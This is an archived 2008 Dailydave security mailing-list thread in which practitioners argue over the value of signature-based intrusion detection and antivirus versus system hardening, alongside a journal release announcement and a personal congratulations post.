web traffic, IM, plus "trusted" vendors, suppliers, contractors, > overseas divisions, and an increasing mobile workforce -- there are > simple rules of physics to contend with here, and as a result the > network on both sides of the firewall is hostile. > > If every exploit set the evil bit, we'd just look for that one thing. > However any signature-based system has to look at all possible attacks. > Now for even ASIC-based systems, you run out of memory real quick. This > is the physics thing I mentioned earlier. Most IDS/IPS vendors have a > ceiling limit on about 1800-2000 signatures that can be active at once. > NO vendor ships with all 5k-10k signatures turned on. The machine would > drop packets and grind to a halt. Therefore what signatures do you pick? > Only the ones that affect your user base? What about home users coming > in via VPN (doubly bad, you may not support the platform AND the > communication is encrypted)? Do you think anti-virus companies have it > any better? > > What about anomaly-based host systems? Arguably better, however there > are two factors that prevent massive deployment: > > 1) You now have to run low-level code on all your systems. Aside from > the technical issues that this may cause, your CxO types may have gotten > burned when the last time code was loaded on every system, it didn't > prevent some massive infection. Additionally, the Gartners of the world > are quick to point out that the upper right quadrant is filled with > signature-based companies anyway, so any consultants/sales people > wanting to make a sale have to explain away that upper quadrant in that > goofy chart. Hybrid systems that use sigs for the low-hanging fruit and > anomaly detection for the hard stuff might creep into the upper right > quad (hopefully you know what I mean by Gartner's upper right quad, > google it if you don't know). > > 2) It is cheaper to deploy technology at the "choke points" instead of > everywhere, and A/V is about all you can expect to get on the desktop > nowadays. Besides the auditors of the world will tell your organization > that due diligence is having that A/V there, on the Exchange server, and > the fact you have a firewall pretty much has you covered from an audit > standpoint. > > My solution would be to lock down the desktops and servers via > hardening, run email and web browsers in sandboxes, and replace the > firewalls with router ACLs that simply take large swipes at the traffic > to help create a division from the outside world. Firewalls are simply > glorified routers at this point anyway, as most are configured to allow > certain types of traffic right in through the front door. > > I used to quote Frank Zappa's comments on modern jazz as "jazz isn't > death, it just smells funny" in presentations, saying the same thing > about perimeter security. Around 2002 or so I simply started saying > perimeter security is just dead. I had a very serious discussion about > this very topic with Bill Cheswick around the same time, with both of us > threatening to write a paper or article on the topic. > > Every time I hear the argument that some level of security, even lame > security, is better than NO security, I think about my Zappa > paraphrasing. In my opinion, lame security is WORSE than no security, > simply because most of the people involved (think CxO/pointy-haired boss > types) live with a sense that they are being protected, when in fact > they are not. The ones with no protection are not living a lie -- they > are at least AWARE they really have no security. > > Mark > - -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.5 (MingW32) > > iD8DBQFHlnf7cWrXS8hLmpIRAlV3AJ4xm+t46kKtUaFZ3zbVB9VmEUIPqwCfcNgi > yEHFuPRkLlrQEI90G/h3RQg= > =DhdV > - -----END PGP SIGNATURE----- > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFHnekTB8JNm+PA+iURAgnLAJ9/MYp/eoneY4TwIr50XRIlAZBgCgCgj8ME > 48wF+iNSfnb0rOEBiF/eSpk= > =d2Lw > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From bmc at snort.org Mon Jan 28 11:33:39 2008 From: bmc at snort.org (Brian) Date: Mon, 28 Jan 2008 11:33:39 -0500 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <479DE915.80200@immunityinc.com> References: <479DE915.80200@immunityinc.com> Message-ID: <20080128163339.GA5796@snort.org> On Mon, Jan 28, 2008 at 09:39:17AM -0500, Someone other than Dave Aitel wrote: > Every time I hear the argument that some level of security, even lame > security, is better than NO security, I think about my Zappa > paraphrasing. In my opinion, lame security is WORSE than no security, > simply because most of the people involved (think CxO/pointy-haired boss > types) live with a sense that they are being protected, when in fact > they are not. The ones with no protection are not living a lie -- they > are at least AWARE they really have no security. Really? I know this has been said before. Horse, baseball bat, applying. Your house still has doors with locks, yet your windows are still trivial to break, bypassing the locks. Go ahead, remove the locks on the doors because obviously, you are better off without it. Oh, no windows? Got siding & drywall house, like most of America? I can cut a new enterance in most houses in minutes, thanks to my trusty sawzall. I know, lets live in brick hosues and hire armed guards to not allow enterance and exit of those that someone deams should not be allwowed in or out. Have fun living in a jail. Me, I'll live with my minor increases in security, as I improve where I can, what I can. Brian From chris.rohlf at gmail.com Mon Jan 28 13:13:58 2008 From: chris.rohlf at gmail.com (Chris Rohlf) Date: Mon, 28 Jan 2008 13:13:58 -0500 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <7db9abd30801280825x6c84d60cg6b95d988a85df728@mail.gmail.com> References: <479DE915.80200@immunityinc.com> <7db9abd30801280825x6c84d60cg6b95d988a85df728@mail.gmail.com> Message-ID: <1681f2df0801281013l21d0f459ka082dae0544b5432@mail.gmail.com> NIDS was not always worthless. I think the attack volume is just too large now to monitor effectively with signatures with any hope of no false positives. Most of my NIDS work these days can be done with ngrep and a bash script because typically I am looking to find the malware-of-the-day. As for Dave's presentation, one time use 0day cannot be stopped, this is pretty clear to anyone in this industry. And no NIDS will detect it. And even if it does - its buried among 5000 other alerts for google chat and browser toolbar installs. In my experience, NIDS are slowly turning into mis-configuration/policy detection tools, which is fine, but doesn't detect an attacker. However some other Anti-* tools are still somewhat effective and relevant compared to nothing at all. Its entirely reactive but organizations that use the technology (not develop it) don't have many other options. The 'real problem' (bad software) - is not theirs to solve, but it is theirs to deal with. On 1/28/08, Kowsik wrote: > After 5+ years of stopping this, stopping that, writing anti-malware, > anti-dos, anti-backdoors, anti-vulnerablities, anti-scanners, > anti-spoofing, anti-this and anti-that, it pretty much came down to > "ENOUGH ALREADY!", for me. > > Being reactive just ain't fun. It gets pretty damn tiring after a > while when for ever rule the ID/PS has, there are like a million > exceptions on the network. No, I'm not just talking about evasions and > obfuscations. One small step for the attacker, one impossible jump for > the rest - especially with the current approach. > > This is not a dig on specific products or how they work. They do what > they are intended to do reasonably well. However, the problem they all > set out to solve is inherently intractable. > > K. > > On Jan 28, 2008 6:39 AM, Dave Aitel wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > > > Post from Mark Loveless who is subscribed from a diff email and hit > > "reply all". My moderation gui drops anything from anyone not > > subscribed, so I'm "moderating" this manually. > > > > - -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > >> Dave my man. I agree that security is an arm's race for > > >> signature based products. Though should we throw out the baby > > >> with the dirty water? Is no firewall, VLANs, route filtering, > > >> IDS, AV, central management/logging, etc better than a lame one? > > >> And besides perhaps some witty vendor will come up with a new > > >> solution. :) > > > > I'll bite. I'd say as a person who has worked on multiple security > > products, it is a losing battle. The network is simply hostile. Forget > > the firewalls with holes in them to allow users to send/receive email, > > web traffic, IM, plus "trusted" vendors, suppliers, contractors, > > overseas divisions, and an increasing mobile workforce -- there are > > simple rules of physics to contend with here, and as a result the > > network on both sides of the firewall is hostile. > > > > If every exploit set the evil bit, we'd just look for that one thing. > > However any signature-based system has to look at all possible attacks. > > Now for even ASIC-based systems, you run out of memory real quick. This > > is the physics thing I mentioned earlier. Most IDS/IPS vendors have a > > ceiling limit on about 1800-2000 signatures that can be active at once. > > NO vendor ships with all 5k-10k signatures turned on. The machine would > > drop packets and grind to a halt. Therefore what signatures do you pick? > > Only the ones that affect your user base? What about home users coming > > in via VPN (doubly bad, you may not support the platform AND the > > communication is encrypted)? Do you think anti-virus companies have it > > any better? > > > > What about anomaly-based host systems? Arguably better, however there > > are two factors that prevent massive deployment: > > > > 1) You now have to run low-level code on all your systems. Aside from > > the technical issues that this may cause, your CxO types may have gotten > > burned when the last time code was loaded on every system, it didn't > > prevent some massive infection. Additionally, the Gartners of the world > > are quick to point out that the upper right quadrant is filled with > > signature-based companies anyway, so any consultants/sales people > > wanting to make a sale have to explain away that upper quadrant in that > > goofy chart. Hybrid systems that use sigs for the low-hanging fruit and > > anomaly detection for the hard stuff might creep into the upper right > > quad (hopefully you know what I mean by Gartner's upper right quad, > > google it if you don't know). > > > > 2) It is cheaper to deploy technology at the "choke points" instead of > > everywhere, and A/V is about all you can expect to get on the desktop > > nowadays. Besides the auditors of the world will tell your organization > > that due diligence is having that A/V there, on the Exchange server, and > > the fact you have a firewall pretty much has you covered from an audit > > standpoint. > > > > My solution would be to lock down the desktops and servers via > > hardening, run email and web browsers in sandboxes, and replace the > > firewalls with router ACLs that simply take large swipes at the traffic > > to help create a division from the outside world. Firewalls are simply > > glorified routers at this point anyway, as most are configured to allow > > certain types of traffic right in through the front door. > > > > I used to quote Frank Zappa's comments on modern jazz as "jazz isn't > > death, it just smells funny" in presentations, saying the same thing > > about perimeter security. Around 2002 or so I simply started saying > > perimeter security is just dead. I had a very serious discussion about > > this very topic with Bill Cheswick around the same time, with both of us > > threatening to write a paper or article on the topic. > > > > Every time I hear the argument that some level of security, even lame > > security, is better than NO security, I think about my Zappa > > paraphrasing. In my opinion, lame security is WORSE than no security, > > simply because most of the people involved (think CxO/pointy-haired boss > > types) live with a sense that they are being protected, when in fact > > they are not. The ones with no protection are not living a lie -- they > > are at least AWARE they really have no security. > > > > Mark > > - -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.4.5 (MingW32) > > > > iD8DBQFHlnf7cWrXS8hLmpIRAlV3AJ4xm+t46kKtUaFZ3zbVB9VmEUIPqwCfcNgi > > yEHFuPRkLlrQEI90G/h3RQg= > > =DhdV > > - -----END PGP SIGNATURE----- > > > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.4.6 (GNU/Linux) > > > > iD8DBQFHnekTB8JNm+PA+iURAgnLAJ9/MYp/eoneY4TwIr50XRIlAZBgCgCgj8ME > > 48wF+iNSfnb0rOEBiF/eSpk= > > =d2Lw > > -----END PGP SIGNATURE----- > > > > _______________________________________________ > > Dailydave mailing list > > Dailydave at lists.immunitysec.com > > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From dailydave at digitaloffense.net Mon Jan 28 14:00:55 2008 From: dailydave at digitaloffense.net (Uninformed Journal) Date: Mon, 28 Jan 2008 13:00:55 -0600 Subject: [Dailydave] Uninformed Journal Release Announcement: Volume 9 Message-ID: <200801281300.55626.dailydave@digitaloffense.net> Uninformed is pleased to announce the release of its 9th volume. This volume includes 4 articles focusing on reverse engineering and exploitation technology. Engineering in Reverse: - An Objective Analysis of the Lockdown Protection System for Battle.net Author: Skywing Exploitation Technology: - ActiveX - Active Exploitation Author: warlord - Context-keyed Payload Encoding Author: I)ruid - Improving Software Security Analysis using Exploitation Properties Author: skape This volume of the journal can be found at: http://www.uninformed.org/?v=9 About Uninformed: Uninformed is a non-commercial technical outlet for research in areas pertaining to security technologies, reverse engineering, and lowlevel programming. The goal, as the name implies, is to act as a medium for providing informative information to the uninformed. The research presented in each edition is simply an example of the evolutionary thought that affects all academic and professional disciplines. - The Uninformed Staff staff [at] uninformed.org From jon at oberheide.org Mon Jan 28 14:05:17 2008 From: jon at oberheide.org (Jon Oberheide) Date: Mon, 28 Jan 2008 14:05:17 -0500 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <1681f2df0801281013l21d0f459ka082dae0544b5432@mail.gmail.com> References: <479DE915.80200@immunityinc.com> <7db9abd30801280825x6c84d60cg6b95d988a85df728@mail.gmail.com> <1681f2df0801281013l21d0f459ka082dae0544b5432@mail.gmail.com> Message-ID: <1201547117.4568.19.camel@jonojono.eecs.umich.edu> > On 1/28/08, Kowsik wrote: > After 5+ years of stopping this, stopping that, writing anti-malware, > anti-dos, anti-backdoors, anti-vulnerablities, anti-scanners, > anti-spoofing, anti-this and anti-that, it pretty much came down to > "ENOUGH ALREADY!", for me. > > Being reactive just ain't fun. It gets pretty damn tiring after a > while when for ever rule the ID/PS has, there are like a million > exceptions on the network. No, I'm not just talking about evasions and > obfuscations. One small step for the attacker, one impossible jump for > the rest - especially with the current approach. > > This is not a dig on specific products or how they work. They do what > they are intended to do reasonably well. However, the problem they all > set out to solve is inherently intractable. As my colleague would say, it's a "security-complete" problem. (No, there is no formal definition for a security-complete class of problems. A problem just automagically becomes security-complete when you reach that "ENOUGH ALREADY" stage and feel like smashing all computing devices in a 10 block radius.) Besides being a meaningless novelty term used to cop-out of hard problems, we can at least make vague, swiss-cheese analogies and compare it to a similar class of problems: NP-complete. We don't give up NP-complete problems because they lack a polynomial-time solution; instead, we develop practical algorithms that provide approximate solutions. You can see where this is going... Regards, Jon Oberheide -- Jon Oberheide GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080128/a7f7dfc1/attachment.pgp From mloveless at autonomic-networks.com Mon Jan 28 15:30:52 2008 From: mloveless at autonomic-networks.com (Mark Loveless) Date: Mon, 28 Jan 2008 12:30:52 -0800 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <20080128163339.GA5796@snort.org> References: <479DE915.80200@immunityinc.com> <20080128163339.GA5796@snort.org> Message-ID: <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > On Mon, Jan 28, 2008 at 09:39:17AM -0500, Someone other than > Dave Aitel wrote: > > Every time I hear the argument that some level of security, > even lame > > security, is better than NO security, I think about my Zappa > > paraphrasing. In my opinion, lame security is WORSE than no > security, > > simply because most of the people involved (think CxO/pointy-haired > > boss > > types) live with a sense that they are being protected, > when in fact > > they are not. The ones with no protection are not living a > lie -- they > > are at least AWARE they really have no security. > > Really? I know this has been said before. Horse, baseball > bat, applying. > > Your house still has doors with locks, yet your windows are > still trivial to break, bypassing the locks. Go ahead, > remove the locks on the doors because obviously, you are > better off without it. > > Oh, no windows? Got siding & drywall house, like most of America? > I can cut a new enterance in most houses in minutes, thanks > to my trusty sawzall. > > I know, lets live in brick hosues and hire armed guards to > not allow enterance and exit of those that someone deams > should not be allwowed in or out. > > Have fun living in a jail. > > Me, I'll live with my minor increases in security, as I > improve where I can, what I can. I actually agree with you 100% on houses. However I was referring to computers... ;-) Here is the main reason the house argument doesn't work. I cannot postal mail you a letter or a package that creates a hidden backdoor into your house that only I have the key to. Sure maybe if I mailed you a bomb, I could create a crude opening in your house, but it would hardly be secret or hidden. There are a few dozen Windows registry tweaks and settings that will do most of the good that anti-virus does. There are choices one can make before web surfing, such as IE for that internal "mission critical" app that uses ActiveX, but the default browser is Firefox with all the J's turned off for web surfing. Ingress and egress filtering on the local firewall. Etc etc etc. Tons of things that can be done that severely limit the attack surface of a Microsoft system. And given the choice of A/V versus anomaly detection, I'd take the latter plus the assorted tweaks. Now as for my comment about no security is better than lame security, let me clarify. Yes the point was somewhat exaggerated to drive the point home. However what I meant was, there are things you can do from a hardening perspective that are just as effective as A/V, and they are free. Also, if the only threat is 0day, and you are not air-gapped, all the IDS/IPS/AV signatures in the world will not help you. You have to limit the attack surface as much as possible. It boils down to this -- upper management has a limited budget, and I think that if you have staff that are spending two weeks out of the year getting signature-based (mainly AV) installed and functioning in some deployment, the money is better spent on hardening. Is there a use for IDS/IPS? Reactively, no as you mainly catch low-hanging fruit and the noisy stuff you could swat with a flyswatter. Proactively, I think there are some possibilities that have yet to be fully explored... * I will stop bantering and work on a presentation that tries to explain this. Maybe it will be at BlackHat or some other con where I face the rotten fruit in person. - -Mark * Such as looking for \xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1 in web traffic, which is found in headers of Office docs. This assumes non-SSL and non-compressed traffic, of course. Yes, my home Snort system has that rule loaded and yes I still play with IDS just for this type of research. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) iD8DBQFHnjt8cWrXS8hLmpIRAj7vAJ48LRVfNRmKH7Fkj17AX/xlGvtuEwCfRIoQ AXIVH33VCUHKOVeWYIei7Do= =lSyF -----END PGP SIGNATURE----- From dave at immunityinc.com Mon Jan 28 16:21:10 2008 From: dave at immunityinc.com (Dave Aitel) Date: Mon, 28 Jan 2008 16:21:10 -0500 Subject: [Dailydave] Congrats to Philippe Biondi! Message-ID: <479E4746.6000104@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 One more person on the SCAPY project now. :> (i.e. he had a daughter, Sophie, so we can expect very little Python out of him for the next few months. :>) - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHnkdFB8JNm+PA+iURAsGoAKCaITi167digu2L5n+1onzUk15fcwCdFQxT d4ayJJzgVxLVvBlgwC57gho= =qxY8 -----END PGP SIGNATURE----- From bmc at snort.org Mon Jan 28 17:04:23 2008 From: bmc at snort.org (Brian) Date: Mon, 28 Jan 2008 17:04:23 -0500 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> References: <479DE915.80200@immunityinc.com> <20080128163339.GA5796@snort.org> <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> Message-ID: <20080128220422.GB7071@snort.org> On Mon, Jan 28, 2008 at 12:30:52PM -0800, Mark Loveless wrote: > I actually agree with you 100% on houses. However I was referring to > computers... ;-) > > Here is the main reason the house argument doesn't work. I cannot > postal mail you a letter or a package that creates a hidden backdoor > into your house that only I have the key to. Sure maybe if I mailed > you a bomb, I could create a crude opening in your house, but it > would hardly be secret or hidden. Again, small improvements are better than none. Anthrax via postal mail might not blow a whole in your house, but it has a good chance at killing most of the people inside. Then what would you do? Oh, install a gamma irradiation system at the postal service to proactively filter a newly used known attack at a common choke point. You can manually iron all of your inbound postal mail, since its mostly good enough [0], or you could have your postal service implement the filtering [1]. Yes, the postal service has known evasions to this attack. You can go on ironing your mail, I will continue to let the postal service filter out most of the attacks. Again, small improvements are better than none. > Now as for my comment about no security is better than lame > security, let me clarify. Yes the point was somewhat exaggerated to > drive the point home. However what I meant was, there are things you > can do from a hardening perspective that are just as effective as > A/V, and they are free. By your exaggeration, you miss the point. Every household has an iron, ok you might not own one but most Americans probably do. I would much rather have the USPS use their known evaidable solution than to convince everyone in the US to iron their mail. Again, small improvements are better than none. Brian [0] - http://www.pittsburghlive.com/x/tribune-review/trib/pittsburgh/s_425621.html [1] - http://www.usps.com/news/facts/lfu_021202.htm From security at brvenik.com Mon Jan 28 17:14:57 2008 From: security at brvenik.com (Sec urity) Date: Mon, 28 Jan 2008 17:14:57 -0500 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <479DE915.80200@immunityinc.com> References: <479DE915.80200@immunityinc.com> Message-ID: There will always be the naysayers that believes that because you cannot achieve perfection you should not even try. inline.... On Jan 28, 2008 9:39 AM, Dave Aitel wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > Post from Mark Loveless who is subscribed from a diff email and hit > "reply all". My moderation gui drops anything from anyone not > subscribed, so I'm "moderating" this manually. > > - -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > >> Dave my man. I agree that security is an arm's race for > >> signature based products. Though should we throw out the baby > >> with the dirty water? Is no firewall, VLANs, route filtering, > >> IDS, AV, central management/logging, etc better than a lame one? > >> And besides perhaps some witty vendor will come up with a new > >> solution. :) > > I'll bite. I'd say as a person who has worked on multiple security > products, it is a losing battle. The network is simply hostile. Forget > the firewalls with holes in them to allow users to send/receive email, > web traffic, IM, plus "trusted" vendors, suppliers, contractors, > overseas divisions, and an increasing mobile workforce -- there are > simple rules of physics to contend with here, and as a result the > network on both sides of the firewall is hostile. Perfection is attained slowly and requires time. Historically it used to be that any kid with a brain and a minute could have their way with your computers. This is no longer the case and it is far less trivial to do so without being caught. The vast majority of threats have also failed to reach perfection; the imperfect ones are eliminated from the landscape well before they can achieve a level of enlightenment representing a true threat. Naysayers would let perfection be the enemy of good. > > If every exploit set the evil bit, we'd just look for that one thing. > However any signature-based system has to look at all possible attacks. > Now for even ASIC-based systems, you run out of memory real quick. This > is the physics thing I mentioned earlier. Most IDS/IPS vendors have a > ceiling limit on about 1800-2000 signatures that can be active at once. > NO vendor ships with all 5k-10k signatures turned on. The machine would > drop packets and grind to a halt. Therefore what signatures do you pick? > Only the ones that affect your user base? What about home users coming > in via VPN (doubly bad, you may not support the platform AND the > communication is encrypted)? Do you think anti-virus companies have it > any better? > > What about anomaly-based host systems? Arguably better, however there > are two factors that prevent massive deployment: > > 1) You now have to run low-level code on all your systems. Aside from > the technical issues that this may cause, your CxO types may have gotten > burned when the last time code was loaded on every system, it didn't > prevent some massive infection. Additionally, the Gartners of the world > are quick to point out that the upper right quadrant is filled with > signature-based companies anyway, so any consultants/sales people > wanting to make a sale have to explain away that upper quadrant in that > goofy chart. Hybrid systems that use sigs for the low-hanging fruit and > anomaly detection for the hard stuff might creep into the upper right > quad (hopefully you know what I mean by Gartner's upper right quad, > google it if you don't know). > > 2) It is cheaper to deploy technology at the "choke points" instead of > everywhere, and A/V is about all you can expect to get on the desktop > nowadays. Besides the auditors of the world will tell your organization > that due diligence is having that A/V there, on the Exchange server, and > the fact you have a firewall pretty much has you covered from an audit > standpoint. Is it better to raise the bar so that threat you likely face is unlikely to do something that gets them caught and as a result never causes you significant pain? What is spenging a few million, slightly trimming a 500 Billion balance sheet, compared to simply letting the thief take 5 Billion from the safe? It is all about $ isn't it? > > My solution would be to lock down the desktops and servers via > hardening, run email and web browsers in sandboxes, and replace the > firewalls with router ACLs that simply take large swipes at the traffic > to help create a division from the outside world. Firewalls are simply > glorified routers at this point anyway, as most are configured to allow > certain types of traffic right in through the front door. Lets not confuse poor implementation with capability. If you think that an approach like this will be effective I say get to it! You will find that the problem is not that simply solved and you just and up shifting the point of entry. Changing any element without considering the motivatiing and demotivating factors is nothing more than choosing to do nothing in a very complicated way and will be equally as ineffective. > > I used to quote Frank Zappa's comments on modern jazz as "jazz isn't > death, it just smells funny" in presentations, saying the same thing > about perimeter security. Around 2002 or so I simply started saying > perimeter security is just dead. I had a very serious discussion about > this very topic with Bill Cheswick around the same time, with both of us > threatening to write a paper or article on the topic. > > Every time I hear the argument that some level of security, even lame > security, is better than NO security, I think about my Zappa > paraphrasing. In my opinion, lame security is WORSE than no security, > simply because most of the people involved (think CxO/pointy-haired boss > types) live with a sense that they are being protected, when in fact > they are not. The ones with no protection are not living a lie -- they > are at least AWARE they really have no security. In the US we often kill the killers and knowing this they STILL seem to kill! Some even get away with it! Should we simply accept that there are a few people that can kill with such skill that they will go uncaught? Should we not even try to catch killers because they _might_ be that one? Should we not try to catch criminals because they might also be that _one_ killer? Simply because there is a superior threat lurking out there does not mean we should not remove the known threats or that we should invite them into our house. IT Security is not a place where we must have perfection in order to have better security, we can easily remove the majority of the criminals from the IT gene pool by taking some simple steps. We should not invite all threats into our house because there are a few skilled ones. We should treat them as the threats they are and force them into a situation where they are forced to find a new path, and get caught in the process. Raising the bar and the cost to model and attack effectively balances the equation for the majority of the world. The solution is not perfect and it still cannot prevent you from losing 7 Billion, it did save you countless billions from preventing other issues. It is trivial to state that anything modeled and systematically attacked will be defeated. It is an entirely different case to actually do it. This discussion seems to happen quarterly. I think it is because Dave fancies himself an infallible threat, gloats about it, and people grant him that license because he and his team are good. It does not make him or any other infallible, they will screw up and get caught, they are not perfect. I doubt seriously that Dave or any other team enters all engagements where they are faced with an equally skilled defender and gets away uncaught. If they were actually in the position of being a criminal they would already be in jail. > > Mark > - -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.5 (MingW32) > > iD8DBQFHlnf7cWrXS8hLmpIRAlV3AJ4xm+t46kKtUaFZ3zbVB9VmEUIPqwCfcNgi > yEHFuPRkLlrQEI90G/h3RQg= > =DhdV > - -----END PGP SIGNATURE----- > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFHnekTB8JNm+PA+iURAgnLAJ9/MYp/eoneY4TwIr50XRIlAZBgCgCgj8ME > 48wF+iNSfnb0rOEBiF/eSpk= > =d2Lw > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From smooge at gmail.com Mon Jan 28 18:13:35 2008 From: smooge at gmail.com (Stephen John Smoogen) Date: Mon, 28 Jan 2008 16:13:35 -0700 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> References: <479DE915.80200@immunityinc.com> <20080128163339.GA5796@snort.org> <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> Message-ID: <80d7e4090801281513m4b616384u5489f743fc03a86f@mail.gmail.com> On Jan 28, 2008 1:30 PM, Mark Loveless wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > > On Mon, Jan 28, 2008 at 09:39:17AM -0500, Someone other than > > Dave Aitel wrote: > > > Every time I hear the argument that some level of security, > > even lame > > > security, is better than NO security, I think about my Zappa > > > paraphrasing. In my opinion, lame security is WORSE than no > > security, > > > simply because most of the people involved (think CxO/pointy-haired > > > boss > > > types) live with a sense that they are being protected, > > when in fact > > > they are not. The ones with no protection are not living a > > lie -- they > > > are at least AWARE they really have no security. > > > > Really? I know this has been said before. Horse, baseball > > bat, applying. > > > > Your house still has doors with locks, yet your windows are > > still trivial to break, bypassing the locks. Go ahead, > > remove the locks on the doors because obviously, you are > > better off without it. > > > > Oh, no windows? Got siding & drywall house, like most of America? > > I can cut a new enterance in most houses in minutes, thanks > > to my trusty sawzall. > > > > I know, lets live in brick hosues and hire armed guards to > > not allow enterance and exit of those that someone deams > > should not be allwowed in or out. > > > > Have fun living in a jail. > > > > Me, I'll live with my minor increases in security, as I > > improve where I can, what I can. > > I actually agree with you 100% on houses. However I was referring to > computers... ;-) > > Here is the main reason the house argument doesn't work. I cannot postal > mail you a letter or a package that creates a hidden backdoor into your > house that only I have the key to. Sure maybe if I mailed you a bomb, I > could create a crude opening in your house, but it would hardly be > secret or hidden. > Actually I would use this analogy as extension. You know that the housekeeper has a vulnerability and you mail her a set of photos of her with the Labrador to get yourself into the house. In this case, the owner could be backdoored by his help, but because this possibility exists does not mean you remove the locks on your door. You just have to make a risk analysis of how much background checking you need to do on the people who have access to the house. -- Stephen J Smoogen. -- CSIRT/Linux System Administrator How far that little candle throws his beams! So shines a good deed in a naughty world. = Shakespeare. "The Merchant of Venice" From lmh at info-pull.com Mon Jan 28 19:16:28 2008 From: lmh at info-pull.com (Lance M. Havok) Date: Tue, 29 Jan 2008 01:16:28 +0100 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <20080128220422.GB7071@snort.org> References: <479DE915.80200@immunityinc.com> <20080128163339.GA5796@snort.org> <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> <20080128220422.GB7071@snort.org> Message-ID: What the hell. I thought nothing would drag me out of hiding, I thought no one would ruin my well deserved get away from this sad community (heh!). But at some point, we have to follow the call of duty! On 1/28/08, Brian wrote: > Again, small improvements are better than none. > > Anthrax via postal mail might not blow a whole in your house, but it > has a good chance at killing most of the people inside. Then what > would you do? Oh, install a gamma irradiation system at the postal > service to proactively filter a newly used known attack at a common > choke point. Aight, Brain, let me introduce you to anthrax. It's a pretty old illness. My family ancestors (say, my grandpa, RIP) was a shepherd. He walked hills with a cane, a freaking insane dog and a whole load of sheeps in mating time. The Lord also walked with a cane and sheeps, through the valley of the shadow of death. And he is still alive (well, I'm aware that most pro-IDS people are atheists, so this line might not make sense to you). Let me save you from Wikipedia craving time, Anthrax was an illness that affected most normally sheeps and other hairy animals (back when my grandpa liked to mess with animals, I'm sure we didn't bury him with a sheep though), causing symptoms that normally showed up first on their skin. The animals, as clever as pro-IDS humans, chewed their legs to death. It was itchy as hell (now you can go to Wikipedia in a futile attempt to counter claim these statements, which I will likely ignore, see http://en.wikipedia.org/wiki/Anthrax#Cutaneous_.28skin.29_anthrax). Then they died once their limbs started rotting or got severely infected (you guess, sheep saliva is serious scheise, although the urine does serve as a disinfectant if you stand the odor). In modern society, we have preventive measures to avoid dieing of stuff like cholera (that funny bacteria that causes great diarrhea and messes up your intestine fluids) and anthrax itself. Unless you are into bestiality and get your parts full of spores and what not. I guess you will die of something else before anthrax kills you. I don't know why you mentioned it, but I guess you are a gringo and you've never been in care of sheeps or had to sleep in the cold night out just to have them eating fresh grass. Great for you buddy. Still no freaking idea on what anthrax is besides what you've seen in FOX NEWS or the newspapers during the post 11-September events. Stop using nonsense examples in nonsense arguments. Please. > You can manually iron all of your inbound postal mail, since its > mostly good enough [0], or you could have your postal service > implement the filtering [1]. Yes, the postal service has known evasions > to this attack. You can go on ironing your mail, I will continue to > let the postal service filter out most of the attacks. Buddy, cholera is still killing people in Africa. So what, stop chewing burgers, that will certainly help humanity better than ironing mail or filtering your spam. Claiming that IDS are necessary is like claiming obese people are necessary as well. They aren't, but shit happens. Live with it, find something else to waste your time on. > Again, small improvements are better than none. Again, we are buying crap we don't need, just because some people want to make us believe we truly need it. IDS are the excuse to waste the security budget on something else that keeps our boss friends (that obviously have money interest on security companies) to get some company paid holidays in Disneyworld. That said, IDS give you an illusion of security. Now you can go watch American Idol. > > By your exaggeration, you miss the point. Every household has an > iron, ok you might not own one but most Americans probably do. I > would much rather have the USPS use their known evaidable solution > than to convince everyone in the US to iron their mail. I'm not sure everyone in the US knows what an iron is. Might start better off teaching some grammar and geography. BTW, I'm not sure why most IDS defenders aren't even employed by Sourcefire. Defending a commercial product for no benefits is pretty sad. It's called fanboyism, and it makes you kinda stupid. From olef.anderson at gmail.com Mon Jan 28 19:31:52 2008 From: olef.anderson at gmail.com (Olef Anderson) Date: Mon, 28 Jan 2008 